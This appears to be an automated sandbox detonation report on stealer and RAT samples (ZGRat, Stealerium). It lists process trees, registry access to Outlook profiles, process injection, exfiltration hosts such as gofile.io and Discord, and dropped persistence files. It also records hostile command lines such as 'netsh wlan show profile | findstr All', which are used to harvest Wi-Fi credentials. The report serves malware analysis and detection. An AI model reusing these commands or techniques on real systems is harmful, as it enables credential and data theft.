--content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=03736972FF31BF8D4652A6A526315093 --renderer-client-id=4 --mojo-platform-channel-handle=2296 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=293C24FCA16FF55C946C9D1A4B780C29 --mojo-platform-channel-handle=2424 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=01D52CBAE8FBB77AF724ABDA1DC63950 --mojo-platform-channel-handle=2676 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=64CD67F886FBE9EAA9AFF20EC0881F8D --mojo-platform-channel-handle=2780 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 169.0.37.23.in-addr.arpa udp
US 8.8.8.8:53 14.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 34.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp

Files

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 b30d3becc8731792523d599d949e63f5
SHA1 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256 b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 752a1f26b18748311b691c7d8fc20633
SHA1 c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512 a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 c223511c13af47b706b807b82beeaaf6
SHA1 c8fc8f5becbd11754cd65dbc08418e2a7dd37fd5
SHA256 2f12ec42fb50a1e42825c92df791725ff5733e5e3748f1d0275f6cf5f1548796
SHA512 603d2ce27610fe36a065525e58532a549f24fd4f2c9fe12804d6dbbfbb773f4b13526a4841619274072eba990f9201fb82c5703fa8e640fd4345efca69e96bd3

Analysis: behavioral8

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

14s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealerium

stealer stealerium

ZGRat

rat zgrat

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A icanhazip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3856 set thread context of 2148 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3856 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe
PID 3856 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe
PID 3856 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe
PID 3856 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe
PID 3856 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe
PID 3856 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe
PID 3856 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe
PID 3856 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe
PID 2148 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe C:\Windows\SysWOW64\cmd.exe
PID 2148 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe C:\Windows\SysWOW64\cmd.exe
PID 2148 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe C:\Windows\SysWOW64\cmd.exe
PID 468 wrote to memory of 4684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 468 wrote to memory of 4684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 468 wrote to memory of 4684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 468 wrote to memory of 1596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 468 wrote to memory of 1596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 468 wrote to memory of 1596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 468 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 468 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 468 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 18.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 icanhazip.com udp
US 104.18.115.97:80 icanhazip.com tcp
US 8.8.8.8:53 evcs-ocsp.ws.symantec.com udp
US 152.199.19.74:80 evcs-ocsp.ws.symantec.com tcp
US 8.8.8.8:53 97.115.18.104.in-addr.arpa udp
US 104.18.115.97:80 icanhazip.com tcp
US 8.8.8.8:53 74.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 store9.gofile.io udp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 239.190.168.206.in-addr.arpa udp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 104.18.115.97:80 icanhazip.com tcp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 54.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

memory/3856-1-0x0000000000240000-0x0000000000458000-memory.dmp

memory/3856-0-0x0000000074790000-0x0000000074F40000-memory.dmp

memory/3856-2-0x0000000004D90000-0x0000000004DA0000-memory.dmp

memory/3856-3-0x0000000004EE0000-0x00000000050E8000-memory.dmp

memory/3856-4-0x0000000005160000-0x000000000536A000-memory.dmp

memory/3856-5-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-10-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-14-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-18-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-24-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-28-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-34-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-36-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-40-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-44-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-48-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-50-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-54-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-58-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-62-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-66-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-68-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-64-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-60-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-56-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-52-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-46-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-42-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-38-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-32-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-30-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-26-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-22-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-20-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-16-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-12-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-8-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-6-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-937-0x0000000005370000-0x0000000005371000-memory.dmp

memory/3856-939-0x0000000005400000-0x000000000544C000-memory.dmp

memory/3856-938-0x0000000005620000-0x00000000057C2000-memory.dmp

memory/3856-940-0x0000000006DF0000-0x0000000007394000-memory.dmp

memory/2148-944-0x0000000000400000-0x0000000000592000-memory.dmp

memory/2148-947-0x0000000005180000-0x00000000051E6000-memory.dmp

memory/2148-946-0x0000000074790000-0x0000000074F40000-memory.dmp

memory/3856-945-0x0000000074790000-0x0000000074F40000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\File2crypt.exe.log

MD5 4a911455784f74e368a4c2c7876d76f4
SHA1 a1700a0849ffb4f26671eb76da2489946b821c34
SHA256 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c
SHA512 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d

memory/2148-948-0x0000000005170000-0x0000000005180000-memory.dmp

memory/2148-953-0x0000000005160000-0x0000000005168000-memory.dmp

memory/2148-952-0x00000000056F0000-0x0000000005716000-memory.dmp

memory/2148-951-0x0000000005660000-0x00000000056F2000-memory.dmp

memory/2148-955-0x00000000067A0000-0x00000000067A8000-memory.dmp

memory/2148-956-0x00000000067C0000-0x00000000067DE000-memory.dmp

memory/2148-954-0x0000000006790000-0x000000000679A000-memory.dmp

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\Browsers\Firefox\Bookmarks.txt

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2148-1013-0x0000000006B20000-0x0000000006BB2000-memory.dmp

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\Process.txt

MD5 cd3f1b337705d2b32c17dc4adc97a2b4
SHA1 45e048692510d63446ee2a5ecabe106b89306bd4
SHA256 d8d763b2649f655efa9b5cf7eb82b56be32bfafbc098577736de35e875d87a48
SHA512 2bd512434dd7066dab77565136dcbe73d869191ef4f09bc458529af3d0b4c88c5898fcdbd644dad80259e12cbefffe36d26a3fe2c252b47117c1a29a7cc9200f

memory/2148-1112-0x0000000005170000-0x0000000005180000-memory.dmp

memory/2148-1114-0x0000000005170000-0x0000000005180000-memory.dmp

memory/2148-1148-0x00000000068B0000-0x000000000692A000-memory.dmp

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\Apps.txt

MD5 8e3475a0678a63edc092dda39fc9bb2d
SHA1 589ce3f8ba1797024f6c0ab06b248c67cf739cac
SHA256 d2ab564b653221a1ee2f60b56437698ea39533e8aaff5773eb4506c3be227099
SHA512 fe263f2624d887400570d3ccaf1c6e79b239f62a1ca20e3bca6c928056be7c84b405ad80dc4bd91b073272a76852ddc8032d586142e272db2beafafd1a0ad96f

memory/2148-1221-0x00000000069D0000-0x0000000006A82000-memory.dmp

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\Debug.txt

MD5 6038c6816d6cd11f7c460c00b2238fc6
SHA1 d4e182455aa02a3363a6ebb5cb0ea987b2507b69
SHA256 856b43e957bd20204f0f34b645706175d6eeb18120e135eccae5d39d99780ca0
SHA512 b00b0ce6fb86f2298c18c6ce748f71882aefe6d995b61e82494edb4647849596537b7e40c8dd7e64d5eae24d2496063d6aa9a24d9ce5a354ca94a85bb6ee4278

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\Directories\Startup.txt

MD5 68c93da4981d591704cea7b71cebfb97
SHA1 fd0f8d97463cd33892cc828b4ad04e03fc014fa6
SHA256 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483
SHA512 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\Directories\OneDrive.txt

MD5 966247eb3ee749e21597d73c4176bd52
SHA1 1e9e63c2872cef8f015d4b888eb9f81b00a35c79
SHA256 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e
SHA512 bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa

memory/2148-1223-0x0000000006D20000-0x0000000006D42000-memory.dmp

memory/2148-1224-0x0000000007E20000-0x0000000008174000-memory.dmp

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\msgid.dat

MD5 2c293d26d4955cc89b70566a8fd0b371
SHA1 20849f72e81215208fc91c52ba2caf57993466bb
SHA256 499481147f342836968aa4af73d5280686a48c91eb9837eda1a1cfcf07f59121
SHA512 2b82cfed0ce3d49376eacdede47010965d529cc45d8c26d9d0bc96df56005f65eef608c177d21fd073284cb3985fbf238bd7ef66638b968977e6a7d01148810a

memory/2148-1236-0x0000000006E70000-0x0000000006E7A000-memory.dmp

memory/2148-1237-0x0000000074790000-0x0000000074F40000-memory.dmp

memory/2148-1238-0x0000000005170000-0x0000000005180000-memory.dmp

memory/2148-1239-0x0000000005170000-0x0000000005180000-memory.dmp

memory/2148-1240-0x0000000005170000-0x0000000005180000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

148s

Max time network

150s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\binded.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Binded.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe C:\Users\Admin\AppData\Local\Temp\rock.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe C:\Users\Admin\AppData\Local\Temp\rock.exe N/A

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3756 set thread context of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3200 set thread context of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\blbrok.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\rock.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe N/A
